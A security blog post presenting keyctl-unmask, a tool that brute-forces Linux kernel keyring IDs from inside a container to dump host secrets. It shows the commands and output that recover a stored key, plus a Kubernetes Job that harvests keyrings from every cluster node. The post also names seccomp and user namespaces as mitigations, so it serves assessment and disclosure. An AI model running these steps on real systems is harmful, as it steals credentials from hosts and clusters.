Have you ever wanted to steal all the secrets from a Linux host from within a container? Sure, we all have. Let’s do it at scale, and I’ll share a tool that speeds this up during security assessments.
Container security folks (including David Howells) have known that the keyctl syscall, when executed from within containers, is problematic: there is no inherent way to isolate the Linux kernel’s keyrings and keys, which are designed to store sensitive content. This means that container runtimes have to bolt on defenses to try to prevent host keys from leaking into a container.
You may find it surprising how often Linux kernel keyrings are used. (At least I was.) For example, Kerberos uses them extensively, products from companies like CyberArk rely on the security of these keyrings, and even systemd uses them.
The tool I’m sharing, keyctl-unmask, will show you how to expose these keys even from within a container.
The keyctl(2) syscall is an API for users to interact with Linux kernel keyrings. These keyrings are designed to store sensitive information per user, session, thread, or process. Along with the syscall interface, most systems have a procfs file at /proc/keys that lists all the keys your account has permission to view.
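To make the /proc/keys interface concrete, here is a small Go sketch that parses one line of that file into its documented fields (ID, flags, usage count, timeout, permissions mask, uid, gid, type, description, per proc(5)). The sample line is invented for illustration; real output varies by host.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Key holds the fields of one /proc/keys line, in the order proc(5)
// documents them: ID(hex) Flags Usage Timeout Perms(hex) UID GID Type Description.
type Key struct {
	ID          int64
	Flags       string
	Usage       int
	Timeout     string
	Perms       uint64
	UID, GID    int
	Type        string
	Description string
}

func parseProcKeysLine(line string) (Key, error) {
	f := strings.Fields(line)
	if len(f) < 9 {
		return Key{}, fmt.Errorf("short /proc/keys line: %q", line)
	}
	id, err := strconv.ParseInt(f[0], 16, 64) // key IDs are printed in hex
	if err != nil {
		return Key{}, err
	}
	usage, _ := strconv.Atoi(f[2])
	perms, err := strconv.ParseUint(f[4], 16, 64) // permissions mask, also hex
	if err != nil {
		return Key{}, err
	}
	uid, _ := strconv.Atoi(f[5])
	gid, _ := strconv.Atoi(f[6])
	return Key{
		ID: id, Flags: f[1], Usage: usage, Timeout: f[3],
		Perms: perms, UID: uid, GID: gid, Type: f[7],
		Description: strings.Join(f[8:], " "), // description may contain spaces
	}, nil
}

func main() {
	// Hypothetical sample line for illustration only.
	line := "320e97ab I--Q---     3 perm 1f3f0000  1000  1000 keyring   _ses: 2"
	k, err := parseProcKeysLine(line)
	if err != nil {
		panic(err)
	}
	fmt.Printf("id=%d type=%s desc=%q perms=%08x\n", k.ID, k.Type, k.Description, k.Perms)
}
```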
For containers, this was deemed a security risk (and you might agree) because you don’t want your containers to be able to access the private keys of the host or other containers.
One part of the original fix for this was simply to “mask” /proc/keys so that cat /proc/keys wouldn’t return any results.
Keyctl-unmask shows what happens when you allow any container the ability to issue keyctl syscalls.
I believe the history of containers trying to protect themselves from this syscall goes something like this:

1. Nothing masks /proc/keys at all, so any user can list the host’s keys.
2. Concerns are raised about containers being able to issue the keyctl syscall.
3. keyctl is added to the list of syscalls blocked by Docker’s default seccomp profile. This is successful and we should still use it today!
4. Runtimes mask /proc/keys so that if you were to cat /proc/keys you wouldn’t see any results.
5. stefanberger starts an Epic Discussion that results in runc creating a new session keyring per container. Cool! That sounds like a security move except it has no impact in reality:
“With the patch, each container gets its own session keyring. However, it does work better with user namespaces enabled than without it. With user namespaces each container has its own session keyring _ses and a ‘docker exec’ joins this session keyring. Without user namespaces enabled, each container also gets a session keyring on ‘docker run’ but a ‘docker exec’ again joins the first created session keyring so that containers share it. The advantage still is that it’s not a keyring shared with the host, even though in the case that user namespaces are not enabled, the containers end up sharing a session keyring upon ‘docker exec.'”
So as of today, your container runtime will likely create its own session keyring per container, and the /proc/keys path will be masked. I’ll try to explain why this doesn’t do much to secure the keyrings. But also note that enabling either seccomp or user namespaces successfully mitigates this threat.
First, let me summarize how keyrings are protected on a host: each key has an owner, a group, and a permissions mask, but that mask also grants rights to any process that merely “possesses” the key, i.e. can reach it through one of its own keyrings. In short, the keyctl API’s protections are smoke and mirrors. If you have root in a container*, you can access any key on the host with some extra steps.
Next, let me show you how you can automate those extra steps:
This will demonstrate how you can brute force all the keys of a host and take over every keyring. keyctl-unmask does the following to unmask all the keys on the host: it walks a range of the int32 key ID space to guess valid keyring IDs, asks the kernel to describe each candidate, and then links and dumps the keyrings it can reach.

To demo this, in one container (we’ll call it secret-server), create a new key representing a secret stored by a container:
docker run --name secret-server -it --security-opt \
seccomp=unconfined antitree/keyctl-unmask /bin/bash
> keyctl add user antitrees_secret thetruthisiliketrees @s
911117332
> keyctl show
Session Keyring
899321446 --alswrv 0 0 keyring: _ses.95f119ce25274b852fc62369089dcb4fbe15678e62eecfdc685d292e6a01f852
911117332 --alswrv 0 0 \_ user: antitrees_secret
root@keyctl-attacker:/# keyctl-unmask -min 0 -max 999999999
10 / 10 [----------------------------------------------------------------------------] 100.00% ? p/s 0s
Output saved to: ./keyctl_ids
root@keyctl-attacker:/# cat keyctl_ids
{
"KeyId": 899321446,
"Valid": true,
"Name": "_ses.95f119ce25274b852fc62369089dcb4fbe15678e62eecfdc685d292e6a01f852",
"Type": "keyring",
"Uid": "0",
"Gid": "0",
"Perms": "3f1b0000",
"String_Content": "\u0014\ufffdN6",
"Byte_Content": "FIxONg==",
"Comments": null,
"Subkeys": [
{
"KeyId": 911117332,
"Valid": true,
"Name": "antitrees_secret",
"Type": "user",
"Uid": "0",
"Gid": "0",
"Perms": "3f010000",
"String_Content": "thetruthisiliketrees",
"Byte_Content": "dGhldHJ1dGhpc2lsaWtldHJlZXM=",
"Comments": null,
"Subkeys": null
}
  ]
}
What’s a container tool without the ability to run in Kubernetes? This shows how to use a Kubernetes Job to run this tool on every single Node in a cluster, mount a persistent volume claim, and dump all the keyrings for each node onto it. Then you can simply jump into the Pod and read the results:
kubectl apply -f https://github.com/antitree/keyctl-unmask/examples/k8s/keyctl-unmask-job.yaml
kubectl exec -it -n test keyctl-unmask-debug-pod -- /bin/bash
> cat /keyctl-output/$NODE_NAME
{
"KeyId": 899321446,
"Valid": true,
"Name": "_ses.95f119ce25274b852fc62369089dcb4fbe15678e62eecfdc685d292e6a01f852",
"Type": "keyring",
...
As I’ve noticed in my other long posts, there’s an inverse relationship between the people who will @ me on Twitter and the people who have read the entire post, so I’ll try to explain the caveats clearly.
Here are some other projects that seem to be using keyctl syscalls (but don’t hate on them; I don’t know if they need to run in containers, but I know they shouldn’t be):

azcopy for Azure